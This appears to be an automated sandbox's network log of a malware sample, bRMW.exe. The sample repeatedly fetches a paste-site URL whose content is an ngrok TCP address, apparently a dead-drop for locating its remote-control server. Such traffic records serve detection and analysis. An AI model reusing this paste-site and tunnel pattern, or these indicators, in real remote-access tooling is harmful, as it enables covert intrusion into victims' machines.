                                                                                                Nov 23, 2023 01:12:32.296725988 CET49847443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:32.296809912 CET44349847148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:32.296917915 CET49847443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:32.297380924 CET49847443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:32.297419071 CET44349847148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:32.550434113 CET44349847148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:32.550554991 CET49847443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:32.553762913 CET49847443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:32.553790092 CET44349847148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:32.554066896 CET44349847148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:32.557333946 CET49847443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:32.557385921 CET44349847148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:32.557471991 CET49847443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:33.672029972 CET49848443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:33.672080994 CET44349848148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:33.672166109 CET49848443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:33.672605038 CET49848443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:33.672621965 CET44349848148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:33.925682068 CET44349848148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:33.925762892 CET49848443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:33.928909063 CET49848443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:33.928920031 CET44349848148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:33.929148912 CET44349848148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:33.935410023 CET49848443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:33.935450077 CET44349848148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:33.935519934 CET49848443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:35.063451052 CET49849443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:35.063483953 CET44349849148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:35.063643932 CET49849443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:35.064137936 CET49849443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:35.064151049 CET44349849148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:35.321639061 CET44349849148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:35.321779966 CET49849443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:35.325196981 CET49849443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:35.325206041 CET44349849148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:35.325442076 CET44349849148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:35.330460072 CET49849443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:35.330503941 CET44349849148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:35.330626965 CET44349849148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:35.330657959 CET49849443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:35.330677986 CET49849443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:36.472795963 CET49850443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:36.472893000 CET44349850148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:36.473045111 CET49850443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:36.473504066 CET49850443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:36.473542929 CET44349850148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:36.730597973 CET44349850148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:36.730709076 CET49850443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:36.733066082 CET49850443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:36.733088970 CET44349850148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:36.733340979 CET44349850148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:36.737420082 CET49850443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:36.737468958 CET44349850148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:36.737543106 CET49850443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:37.859778881 CET49851443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:37.859810114 CET44349851148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:37.859894037 CET49851443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:37.860409021 CET49851443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:37.860419989 CET44349851148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:38.116549969 CET44349851148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:38.116658926 CET49851443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:38.118963003 CET49851443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:38.118971109 CET44349851148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:38.119174004 CET44349851148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:38.123013973 CET49851443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:38.123044014 CET44349851148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:38.123116016 CET49851443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:39.250153065 CET49852443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:39.250195980 CET44349852148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:39.250268936 CET49852443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:39.250758886 CET49852443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:39.250778913 CET44349852148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:39.503278971 CET44349852148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:39.503348112 CET49852443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:39.505028963 CET49852443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:39.505038023 CET44349852148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:39.505279064 CET44349852148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:39.508574963 CET49852443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:39.508615971 CET44349852148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:39.508673906 CET49852443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:40.625370026 CET49853443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:40.625439882 CET44349853148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:40.625566959 CET49853443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:40.626122952 CET49853443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:40.626143932 CET44349853148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:40.882061005 CET44349853148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:40.882170916 CET49853443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:40.884287119 CET49853443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:40.884311914 CET44349853148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:40.884546995 CET44349853148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:40.888324022 CET49853443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:40.888367891 CET44349853148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:40.888434887 CET49853443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:42.015989065 CET49854443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:42.016045094 CET44349854148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:42.016114950 CET49854443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:42.016876936 CET49854443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:42.016901970 CET44349854148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:42.269098997 CET44349854148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:42.269228935 CET49854443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:42.270978928 CET49854443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:42.270992994 CET44349854148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:42.271202087 CET44349854148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:42.273665905 CET49854443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:42.273701906 CET44349854148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:42.273766041 CET49854443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:43.390476942 CET49855443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:43.390512943 CET44349855148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:43.390587091 CET49855443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:43.391100883 CET49855443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:43.391108990 CET44349855148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:43.640372038 CET44349855148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:43.640451908 CET49855443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:43.641895056 CET49855443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:43.641900063 CET44349855148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:43.642088890 CET44349855148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:43.644038916 CET49855443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:43.644057989 CET44349855148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:43.644109964 CET49855443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:45.220906019 CET49856443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:45.220938921 CET44349856148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:45.221007109 CET49856443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:45.221417904 CET49856443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:45.221431017 CET44349856148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:45.474040985 CET44349856148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:45.474241972 CET49856443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:45.476015091 CET49856443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:45.476022959 CET44349856148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:45.476399899 CET44349856148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:45.479959965 CET49856443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:45.479993105 CET44349856148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:45.480057955 CET49856443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:46.594312906 CET49857443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:46.594362974 CET44349857148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:46.594465017 CET49857443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:46.595392942 CET49857443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:46.595412970 CET44349857148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:46.849595070 CET44349857148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:46.849837065 CET49857443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:46.851762056 CET49857443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:46.851780891 CET44349857148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:46.852113008 CET44349857148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:46.856458902 CET49857443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:46.856534004 CET44349857148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:46.856604099 CET49857443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:47.984965086 CET49858443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:47.985006094 CET44349858148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:47.985088110 CET49858443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:47.985784054 CET49858443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:47.985795975 CET44349858148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:48.238086939 CET44349858148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:48.238172054 CET49858443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:48.239918947 CET49858443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:48.239933968 CET44349858148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:48.240139961 CET44349858148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:48.242347956 CET49858443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:48.242382050 CET44349858148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:48.242435932 CET49858443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:49.370995998 CET49859443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:49.371082067 CET44349859148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:49.371210098 CET49859443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:49.371834040 CET49859443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:49.371850014 CET44349859148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:49.626701117 CET44349859148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:49.626897097 CET49859443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:49.628679037 CET49859443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:49.628695011 CET44349859148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:49.628930092 CET44349859148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:49.632770061 CET49859443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:49.632812023 CET44349859148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:49.632882118 CET49859443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:50.750696898 CET49860443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:50.750788927 CET44349860148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:50.750878096 CET49860443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:50.751945019 CET49860443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:50.751977921 CET44349860148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:51.002048016 CET44349860148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:51.002147913 CET49860443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:51.004188061 CET49860443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:51.004199982 CET44349860148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:51.004427910 CET44349860148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:51.007989883 CET49860443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:51.008028030 CET44349860148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:51.008115053 CET49860443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:52.125591993 CET49861443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:52.125648975 CET44349861148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:52.125705957 CET49861443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:52.126538038 CET49861443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:52.126560926 CET44349861148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:52.379374981 CET44349861148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:52.379520893 CET49861443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:52.381722927 CET49861443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:52.381742001 CET44349861148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:52.381963968 CET44349861148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:52.385771990 CET49861443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:52.385833979 CET44349861148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:52.385906935 CET49861443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:53.500854969 CET49862443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:53.500890970 CET44349862148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:53.501003027 CET49862443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:53.501916885 CET49862443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:53.501925945 CET44349862148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:53.755378962 CET44349862148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:53.755450010 CET49862443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:53.757659912 CET49862443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:53.757666111 CET44349862148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:53.757880926 CET44349862148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:53.759833097 CET49862443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:53.759855986 CET44349862148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:53.759912968 CET49862443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:54.875493050 CET49863443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:54.875538111 CET44349863148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:54.875663042 CET49863443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:54.876425982 CET49863443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:54.876451015 CET44349863148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:55.132733107 CET44349863148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:55.132814884 CET49863443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:55.134248972 CET49863443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:55.134258986 CET44349863148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:55.134489059 CET44349863148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:55.136454105 CET49863443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:55.136487961 CET44349863148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:55.136540890 CET49863443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:56.255300045 CET49864443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:56.255336046 CET44349864148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:56.255410910 CET49864443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:56.255862951 CET49864443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:56.255878925 CET44349864148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:56.512325048 CET44349864148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:56.512475967 CET49864443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:56.514417887 CET49864443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:56.514427900 CET44349864148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:56.514682055 CET44349864148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:56.519830942 CET49864443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:56.519867897 CET44349864148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:56.519937038 CET49864443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:57.640933990 CET49865443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:57.640964031 CET44349865148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:57.641036987 CET49865443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:57.641732931 CET49865443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:57.641743898 CET44349865148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:57.894428968 CET44349865148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:57.894526958 CET49865443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:57.896182060 CET49865443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:57.896187067 CET44349865148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:57.896394968 CET44349865148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:57.900188923 CET49865443192.168.2.5148.72.177.212
                                                                                                Nov 23, 2023 01:12:57.900221109 CET44349865148.72.177.212192.168.2.5
                                                                                                Nov 23, 2023 01:12:57.900276899 CET49865443192.168.2.5148.72.177.212
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Nov 23, 2023 01:08:52.910204887 CET6520653192.168.2.51.1.1.1
                                                                                                Nov 23, 2023 01:08:53.042126894 CET53652061.1.1.1192.168.2.5
                                                                                                Nov 23, 2023 01:08:53.818633080 CET4976853192.168.2.51.1.1.1
                                                                                                Nov 23, 2023 01:08:53.952702999 CET53497681.1.1.1192.168.2.5
                                                                                                Nov 23, 2023 01:09:56.041129112 CET5287353192.168.2.51.1.1.1
                                                                                                Nov 23, 2023 01:09:56.169384956 CET53528731.1.1.1192.168.2.5
                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Nov 23, 2023 01:08:52.910204887 CET192.168.2.51.1.1.10x6455Standard query (0)pt.textbin.netA (IP address)IN (0x0001)false
                                                                                                Nov 23, 2023 01:08:53.818633080 CET192.168.2.51.1.1.10xd465Standard query (0)0.tcp.sa.ngrok.ioA (IP address)IN (0x0001)false
                                                                                                Nov 23, 2023 01:09:56.041129112 CET192.168.2.51.1.1.10xae53Standard query (0)0.tcp.sa.ngrok.ioA (IP address)IN (0x0001)false
                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Nov 23, 2023 01:08:53.042126894 CET1.1.1.1192.168.2.50x6455No error (0)pt.textbin.nettextbin.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Nov 23, 2023 01:08:53.042126894 CET1.1.1.1192.168.2.50x6455No error (0)textbin.net148.72.177.212A (IP address)IN (0x0001)false
                                                                                                Nov 23, 2023 01:08:53.952702999 CET1.1.1.1192.168.2.50xd465No error (0)0.tcp.sa.ngrok.io18.229.248.167A (IP address)IN (0x0001)false
                                                                                                Nov 23, 2023 01:09:56.169384956 CET1.1.1.1192.168.2.50xae53No error (0)0.tcp.sa.ngrok.io18.229.248.167A (IP address)IN (0x0001)false
                                                                                                • pt.textbin.net
                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.549704148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:08:53 UTC148OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                Connection: Keep-Alive
                                                                                                2023-11-23 00:08:53 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 30 38 3a 35 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:08:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:08:53 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.549706148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:08:57 UTC124OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                2023-11-23 00:08:57 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 30 38 3a 35 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:08:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:08:57 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.549708148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:09:01 UTC124OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
